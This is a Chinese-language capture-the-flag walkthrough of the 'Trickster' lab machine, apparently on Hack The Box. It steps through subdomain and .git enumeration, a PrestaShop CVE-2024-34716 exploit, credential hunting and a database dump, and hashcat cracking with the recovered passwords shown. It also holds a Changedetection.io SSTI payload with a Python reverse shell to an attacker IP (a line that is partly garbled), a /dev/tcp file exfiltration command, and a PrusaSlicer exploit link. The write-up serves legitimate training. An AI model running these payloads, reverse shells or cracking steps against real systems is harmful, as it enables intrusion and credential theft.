Linux渗透实战：Trickster靶机渗透教学文档<\/h1>

信息收集阶段<\/h2>

端口扫描<\/h3>
使用nmap进行初始扫描：<\/p>
nmap -sT --min-rate 10000<\/span> -p- 10.10.11.34
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22\/tcp (SSH)<\/li>
80\/tcp (HTTP)<\/li>
<\/ul>
详细扫描：<\/p>
nmap -sTVC -O -p22,80 10.10.11.34
<\/span><\/span><\/code><\/pre>获取服务信息：<\/p>

OpenSSH 8.9p1 Ubuntu 3ubuntu0.10<\/li>
Apache httpd 2.4.52 (Ubuntu)<\/li>
<\/ul>
Web服务枚举<\/h3>

发现shop子域名：<\/li>
<\/ol>
ffuf -c -w \/usr\/share\/wordlists\/amass\/subdomains-top1mil-110000.txt -u 'http:\/\/trickster.htb'<\/span> -H "Host:FUZZ.trickster.htb"<\/span> -fw 20<\/span>
<\/span><\/span><\/code><\/pre>
目录爆破：<\/li>
<\/ol>
feroxbuster --url http:\/\/shop.trickster.htb\/ --status-codes '200,301,302'<\/span>
<\/span><\/span><\/code><\/pre>发现.git<\/code>泄露漏洞<\/p>
初始访问<\/h2>
.git泄露利用<\/h3>
使用GitHack工具：<\/p>
python3 GitHack.py http:\/\/shop.trickster.htb\/.git\/
<\/span><\/span><\/code><\/pre>发现admin路由：admin634ewutrx1jgitlooaj<\/code><\/p>
CVE-2024-34716利用<\/h3>
PrestaShop 8.1.5存在RCE漏洞：<\/p>
python3 exploit.py --url 'http:\/\/shop.trickster.htb\/'<\/span> --email 'Obito@qq.com'<\/span> --local-ip 10.10.16.41 --admin-path 'admin634ewutrx1jgitlooaj'<\/span>
<\/span><\/span><\/code><\/pre>获取www-data权限<\/p>
权限提升<\/h2>
数据库枚举<\/h3>

查找配置文件：<\/li>
<\/ol>
find \/var\/www -name '*config*'<\/span> 2>\/dev\/null
<\/span><\/span>grep -R -i pass .\/* 2>\/dev\/null
<\/span><\/span><\/code><\/pre>在parameters.php<\/code>中发现数据库凭据<\/p>

连接MySQL：<\/li>
<\/ol>
mysql -u ps_user -p prest@shop_o
<\/span><\/span><\/code><\/pre>
使用mysqldump转储数据库：<\/li>
<\/ol>
mysqldump -u ps_user -p --all-databases > \/tmp\/backup.sql
<\/span><\/span><\/code><\/pre>获取用户凭据：<\/p>

adam@trickster.htb:\(2y\)<\/span>10$kY2G39RBz9P0S48EuSobuOJba\/HgmQ7ZtajfZZ3plVLWnaBbS4gei<\/li>
james@trickster.htb:\(2a\)<\/span>04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt\/OzGw9UHi4UnlK6yG5LyunCmm<\/li>
<\/ul>

使用hashcat破解：<\/li>
<\/ol>
hashcat '$2y$10$kY2G39RBz9P0S48EuSobuOJba\/HgmQ7ZtajfZZ3plVLWnaBbS4gei'<\/span> -m 3200<\/span> -a 0<\/span> \/usr\/share\/wordlists\/rockyou.txt
<\/span><\/span>hashcat '$2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt\/OzGw9UHi4UnlK6yG5LyunCmm'<\/span> -m 3200<\/span> -a 0<\/span> \/usr\/share\/wordlists\/rockyou.txt
<\/span><\/span><\/code><\/pre>成功破解james密码：alwaysandforever<\/code><\/p>
内网枚举<\/h3>

发现Docker网络：<\/li>
<\/ol>
for<\/span> i in {<\/span>1..254}<\/span>; do<\/span> ping -c 1<\/span> -W 0.1 172.17.0.$i|grep from;done<\/span>
<\/span><\/span><\/code><\/pre>
端口扫描：<\/li>
<\/ol>
for<\/span> i in {<\/span>1..65535}<\/span>; do<\/span> (<\/span>echo < \/dev\/tcp\/172.17.0.2\/$i)<\/span> &>\/dev\/null &&<\/span> printf "\n[+] The open port is : %d\n"<\/span> "<\/span>$i"<\/span> ||<\/span> printf "."<\/span>;done<\/span>
<\/span><\/span><\/code><\/pre>发现5000端口<\/p>

SSH端口转发：<\/li>
<\/ol>
ssh james@trickster.htb -L 0.0.0.0:5000:172.17.0.2:5000
<\/span><\/span><\/code><\/pre>CVE-2024-32651利用<\/h3>
Changedetection.io v0.45.20存在SSTI漏洞：<\/p>
{{ self.__init__.__globals__.__builtins__.__import__('os').system('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.41",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["\/bin\/sh","-i"read() }}
<\/code><\/pre>
Adam凭证获取<\/h3>

发现备份文件：<\/li>
<\/ol>
cat changedetection-backup-20241224060547.zip > \/dev\/tcp\/172.17.0.1\/6666
<\/span><\/span><\/code><\/pre>
解压br文件：<\/li>
<\/ol>
brotli -d f04f0732f120c0cc84a993ad99decb2c.txt.br
<\/span><\/span><\/code><\/pre>获取adam密码：adam_admin992<\/code><\/p>
最终提权<\/h2>
PrusaSlicer 2.6.1 - Arbitrary code execution<\/h3>
使用自动化脚本：<\/p>
https:\/\/github.com\/suce0155\/prusaslicer_exploit
<\/span><\/span><\/code><\/pre>修改exploit.sh中的IP和PORT后执行<\/p>
总结<\/h2>
渗透路径：<\/p>

通过.git泄露发现admin路由<\/li>
利用PrestaShop 8.1.5的CVE-2024-34716获取初始shell<\/li>
查找配置文件获取数据库凭据<\/li>
转储数据库并破解用户hash<\/li>
通过SSH端口转发访问内网服务<\/li>
利用Changedetection.io的CVE-2024-32651获取容器root<\/li>
从备份文件中获取adam凭据<\/li>
最后利用PrusaSlicer漏洞获取主机root权限<\/li>
<\/ol>